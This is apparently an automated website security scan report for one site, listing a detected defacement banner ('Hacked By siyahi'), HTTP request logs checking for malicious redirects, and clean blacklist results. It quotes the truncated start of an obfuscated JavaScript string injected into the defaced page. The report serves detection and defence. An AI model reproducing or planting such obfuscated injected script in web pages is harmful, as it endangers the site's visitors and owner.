Scanned pages/files
Request | Server response | Status |
http://amssfo.com/ | 200 OK Content-Length: 12694 Content-Type: text/html | suspicious |
Deface/Content modification. The following signature was found: Hacked By siyahi <html>
<head> <meta content="Hacked By siyahi" name="subject"> <meta content="Hacked By siyahi" name="Abstract"> <meta content="Hacked By siyahi" name="description"> <SCRIPT> var x = "_=(\"i%92eo%89G{bY%8FR%91]Zayi%92%84%84kFM%8FZ%91%8FgY%8Fqua%8" + "FiR%91]Z%8FhZpTTljOt%84%8CT%8FFLm%8FtZ%7FFLj%8FZpOdljLOja%8Fi%92kLO%7F" + "FMu%84%84ayi%92%84%84kFM%8FgY%8Fqua%8FiR%91]Z%8FhZpTTljOt%84%8CT%8FFLq" + "%8FtZ%7FFLj%8FZpOdlj ...[12935 bytes skipped]... | ||
http://amssfo.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: amssfo.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 26 Dec 2015 01:14:43 GMT
Accept-Ranges: bytes
ETag: "3196-513124f3418a2"
Server: Apache
Vary: Accept-Encoding
Content-Length: 12694
Content-Type: text/html
Last-Modified: Mon, 06 Apr 2015 18:17:22 GMT
X-Pad: avoid browser bug
...12694 bytes of data.
GET / HTTP/1.1
Host: amssfo.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 26 Dec 2015 01:14:43 GMT
Accept-Ranges: bytes
ETag: "3196-513124f3418a2"
Server: Apache
Vary: Accept-Encoding
Content-Length: 12694
Content-Type: text/html
Last-Modified: Mon, 06 Apr 2015 18:17:22 GMT
X-Pad: avoid browser bug
...12694 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: amssfo.com
Referer: http://www.google.com/search?q=amssfo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: amssfo.com
Referer: http://www.google.com/search?q=amssfo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=amssfo.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://amssfo.com/
Result: amssfo.com is not infected or malware details are not published yet.
Result: amssfo.com is not infected or malware details are not published yet.